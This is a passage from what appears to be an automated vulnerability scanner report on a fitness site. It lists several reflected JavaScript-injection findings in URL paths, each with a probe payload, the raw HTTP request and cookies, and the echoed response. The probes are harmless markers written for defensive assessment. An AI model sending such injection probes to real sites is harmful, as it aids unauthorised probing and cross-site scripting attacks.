Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:37:45 +0000
ETag: "1297607865-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:37:46 GMT
Date: Sun, 13 Feb 2011 14:37:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49288

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/tipsc8434';fe291e813f7?destination=node%2Ftipsc8434';fe291e813f7&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.5. http://fitbie.msn.com/get-fit/anytime-anywhere-yoga [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /get-fit/anytime-anywhere-yoga

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 32eff'%3b00652598ff was submitted in the REST URL parameter 2. This input was echoed as 32eff';00652598ff in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /get-fit/anytime-anywhere-yoga32eff'%3b00652598ff HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Fri, 11 Feb 2011 21:10:00 +0000
ETag: "1297458600-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Fri, 11 Feb 2011 22:10:01 GMT
Date: Fri, 11 Feb 2011 21:10:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51037

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/anytime-anywhere-yoga32eff';00652598ff?destination=node%2Fanytime-anywhere-yoga32eff';00652598ff&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.6. http://fitbie.msn.com/get-fit/belly-abs [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /get-fit/belly-abs

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 270c8'%3baff2528c191 was submitted in the REST URL parameter 2. This input was echoed as 270c8';aff2528c191 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /get-fit/belly-abs270c8'%3baff2528c191 HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:32:29 +0000
ETag: "1297607549-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:32:30 GMT
Date: Sun, 13 Feb 2011 14:32:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49161

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/belly-abs270c8';aff2528c191?destination=node%2Fbelly-abs270c8';aff2528c191&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.7. http://fitbie.msn.com/get-fit/cardio [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /get-fit/cardio

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 958ff'%3b9e9fbc2f957 was submitted in the REST URL parameter 2. This input was echoed as 958ff';9e9fbc2f957 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /get-fit/cardio958ff'%3b9e9fbc2f957 HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:33:29 +0000
ETag: "1297607609-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:33:29 GMT
Date: Sun, 13 Feb 2011 14:33:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49143

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/cardio958ff';9e9fbc2f957?destination=node%2Fcardio958ff';9e9fbc2f957&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.8. http://fitbie.msn.com/get-fit/men [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /get-fit/men

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66306'%3b9c7c60c12cc was submitted in the REST URL parameter 2. This input was echoed as 66306';9c7c60c12cc in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /get-fit/men66306'%3b9c7c60c12cc HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:34:40 +0000
ETag: "1297607680-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:34:40 GMT
Date: Sun, 13 Feb 2011 14:34:40 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49125

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/men66306';9c7c60c12cc?destination=node%2Fmen66306';9c7c60c12cc&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.9. http://fitbie.msn.com/get-fit/reveal-your-abs-good [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /get-fit/reveal-your-abs-good

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fabaa'%3bcb57fb69a4d was submitted in the REST URL parameter 2. This input was echoed as fabaa';cb57fb69a4d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /get-fit/reveal-your-abs-goodfabaa'%3bcb57fb69a4d HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:35:00 +0000
ETag: "1297607700-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:35:01 GMT
Date: Sun, 13 Feb 2011 14:35:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49227

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/reveal-your-abs-goodfabaa';cb57fb69a4d?destination=node%2Freveal-your-abs-goodfabaa';cb57fb69a4d&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.10. http://fitbie.msn.com/get-fit/strength-training [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /get-fit/strength-training

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4bf58'%3bbb24d26f8c8 was submitted in the REST URL parameter 2. This input was echoed as 4bf58';bb24d26f8c8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /get-fit/strength-training4bf58'%3bbb24d26f8c8 HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:32:38 +0000
ETag: "1297607558-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:32:38 GMT
Date: Sun, 13 Feb 2011 14:32:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49209

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/strength-training4bf58';bb24d26f8c8?destination=node%2Fstrength-training4bf58';bb24d26f8c8&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.11. http://fitbie.msn.com/get-fit/walking [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /get-fit/walking

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6c4b4'%3b301467b08e9 was submitted in the REST URL parameter 2. This input was echoed as 6c4b4';301467b08e9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /get-fit/walking6c4b4'%3b301467b08e9 HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:32:20 +0000
ETag: "1297607540-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:32:21 GMT
Date: Sun, 13 Feb 2011 14:32:21 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49149

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/walking6c4b4';301467b08e9?destination=node%2Fwalking6c4b4';301467b08e9&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.12. http://fitbie.msn.com/get-fit/women [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /get-fit/women

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ff36'%3b29b10a83ad4 was submitted in the REST URL parameter 2. This input was echoed as 2ff36';29b10a83ad4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /get-fit/women2ff36'%3b29b10a83ad4 HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
